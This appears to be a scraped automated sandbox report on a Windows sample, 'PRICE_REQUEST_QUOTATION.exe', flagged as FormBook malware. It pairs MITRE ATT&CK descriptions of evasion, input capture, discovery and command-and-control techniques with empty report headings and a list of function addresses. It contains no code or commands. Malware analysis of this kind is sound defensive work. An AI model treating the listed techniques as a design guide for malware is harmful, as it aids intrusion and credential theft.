Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315
stringfilecomCOMMON

Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 7333A402, Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 0040361A, Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174
fileCOMMON

Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Function 7333AFD5, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 7333A000, Relevance: 7.7, APIs: 5, Instructions: 193
fileCOMMON

Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 73337500, Relevance: 3.2, APIs: 2, Instructions: 162
memoryCOMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004056E5, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 00404802, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406354, Relevance: .3, Instructions: 334
COMMONCrypto

Function 00406B2B, Relevance: .3, Instructions: 300
COMMONCrypto